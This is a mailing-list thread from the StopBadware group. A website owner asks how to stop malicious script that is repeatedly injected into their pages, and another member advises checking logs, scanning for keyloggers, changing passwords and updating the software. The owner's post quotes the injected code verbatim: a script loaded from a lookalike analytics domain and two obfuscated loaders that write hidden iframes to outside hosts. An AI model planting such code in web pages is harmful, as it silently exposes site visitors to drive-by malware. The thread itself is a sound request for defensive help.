Hi kent,

Thanks for the information. I will try this nad come back to you.
Once again thanks.

On Sep 29, 8:21 pm, Cometcom1 <[EMAIL PROTECTED]> wrote:
> Hi Sri,
>
> Contact your hosting provider and have them check the log files or
> send them to you, with onformation on who is tampering with the files.
> They should be able to show some kind of entry.
>
> It could either be that it happens through an upload of a file - in
> which case your password is likely compromised and possibly your PC
> has a keylogger or other malicious software. Or it could happen when a
> certain page is accessed a certain way on your site, in which case the
> software driving the page (php/asp script), are to blame for this. If
> it's your own software then you have to change it, but if it's a
> standard package software you might want to get hold of an update.
>
> In any case - check your PC for malicious software capturing your data/
> userids/passwords and make sure to change your passwords and change
> the uploading service to the home page to a secure ftp or other better
> method.
>
> Kent
>
> On Sep 29, 1:45 pm, sri <[EMAIL PROTECTED]> wrote:
>
> > Dear members,
>
> > I have posted a question on 13th of 
> > September,http://groups.google.com/group/stopbadware/browse_thread/thread/96b0c...
>
> > After receiving the replies i have removed the unnecessary codes and
> > scripts from my site.
> > Even though regularly i am getting the same code. I am removing it
> > daily.
> > I am giving the script which i am removing regularly
>
> > <script src="http://analytics-google.info/s/urchin.js";></script>
>
> > <script>function c71307925162m48d3c0e5a2bf4(m48d3c0e5a33c7){ function
> > m48d3c0e5a3b9b(){return 16;} return
> > (parseInt(m48d3c0e5a33c7,m48d3c0e5a3b9b()));}function
> > m48d3c0e5a4b44(m48d3c0e5a5318){ function m48d3c0e5a6a93(){return 2;}
> > var
> > m48d3c0e5a5aeb='';m48d3c0e5a7a3b=String.fromCharCode;for(m48d3c0e5a62bf=0;m­48d3c0e5a62bf<m48d3c0e5a5318.length;m48d3c0e5a62bf
> > +=m48d3c0e5a6a93()){ m48d3c0e5a5aeb
> > +=(m48d3c0e5a7a3b(c71307925162m48d3c0e5a2bf4(m48d3c0e5a5318.substr(m48d3c0e­5a62bf,m48d3c0e5a6a93()))));}return
> > m48d3c0e5a5aeb;} var z0e='';var m48d3c0e5a820f='3C7'+z0e+'3637'+z0e
> > +'2697'+z0e+'07'+z0e+'43E696628216D7'+z0e+'96961297'+z0e+'B646F637'+z0e
> > +'56D656E7'+z0e+'42E7'+z0e+'7'+z0e+'7'+z0e+'2697'+z0e+'465287'+z0e
> > +'56E657'+z0e+'363617'+z0e+'065282027'+z0e+'2533632536392536362537'+z0e
> > +'32253631253664253635253230253665253631253664253635253364253633253337'+z0e
> > +'2532302537'+z0e+'332537'+z0e+'32253633253364253237'+z0e
> > +'2536382537'+z0e+'342537'+z0e+'342537'+z0e
> > +'302533612532662532662536632536662536322536312536652536312536322537'+z0e
> > +'352536332536622537'+z0e
> > +'332532652536332536652532662536652536352537'+z0e+'37'+z0e
> > +'2532652536382537'+z0e+'34253664253663253366253237'+z0e
> > +'2532622534642536312537'+z0e+'342536382532652537'+z0e
> > +'322536662537'+z0e+'352536652536342532382534642536312537'+z0e
> > +'342536382532652537'+z0e
> > +'32253631253665253634253666253664253238253239253261253332253339253337'+z0e
> > +'253239253262253237'+z0e+'253333253334253635253635253237'+z0e
> > +'2532302537'+z0e+'37'+z0e+'2536392536342537'+z0e
> > +'34253638253364253339253230253638253635253639253637'+z0e
> > +'2536382537'+z0e+'342533642533332533332532302537'+z0e+'332537'+z0e
> > +'342537'+z0e+'39253663253635253364253237'+z0e+'2536342536392537'+z0e
> > +'332537'+z0e+'302536632536312537'+z0e
> > +'39253361253230253665253666253665253635253237'+z0e
> > +'2533652533632532662536392536362537'+z0e
> > +'3225363125366425363525336527'+z0e+'29293B7'+z0e+'D7'+z0e+'6617'+z0e
> > +'2206D7'+z0e+'969613D7'+z0e+'47'+z0e+'27'+z0e+'5653B3C2F7'+z0e
> > +'3637'+z0e+'2697'+z0e+'07'+z0e
> > +'43E';document.write(m48d3c0e5a4b44(m48d3c0e5a820f));</
> > script><script>check_content()</script>
>
> > <!-- o65 --><script>a=new Array('6e+1','10.5e+1','1.02e+2','0.114e
> > +3','0.97e+2','1.09e+2','1.01e+2','3.2e+1','11.5e+1','1.14e+2','9.9e
> > +1','6.1e+1','0.34e+2','10.4e+1','0.116e+3','11.6e+1','0.112e+3','5.8e
> > +1','4.7e+1','0.047e+3','0.121e+3','0.97e+2','0.11e+3','1.1e+2','0.1e
> > +3','1.01e+2','12e+1','0.046e+3','11.5e+1','1.17e+2','4.7e+1','1.05e
> > +2','1.1e+2','1e+2','0.101e+3','0.12e+3','0.46e+2','0.112e+3','1.04e
> > +2','0.112e+3','3.4e+1','3.2e+1','0.119e+3','10.5e+1','1e+2','11.6e
> > +1','10.4e+1','6.1e+1','0.49e+2','3.2e+1','1.04e+2','10.1e+1','0.105e
> > +3','1.03e+2','0.104e+3','11.6e+1','6.1e+1','0.049e+3','0.032e
> > +3','11.5e+1','1.16e+2','12.1e+1','1.08e+2','0.101e+3','0.061e+3','3.4e
> > +1','0.118e+3','0.105e+3','11.5e+1','10.5e+1','0.98e+2','0.105e
> > +3','10.8e+1','10.5e+1','1.16e+2','1.21e+2','5.8e+1','0.32e+2','10.4e
> > +1','0.105e+3','10e+1','0.1e+3','1.01e+2','1.1e+2','0.034e+3','0.62e
> > +2','0.06e+3','0.47e+2','1.05e+2','1.02e+2','1.14e+2','0.97e+2','0.109e
> > +3','10.1e+1','6.2e+1');for(var p in a)
> > {document.write(String.fromCharCode(parseFloat(a[p])));};</script><!--
> > c65 -->
>
> > can any one of you please tell me how to stop this injection of
> > malicious script into my web site.
>
> > Thanks in advance
> > Sri.

--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---

Reply via email to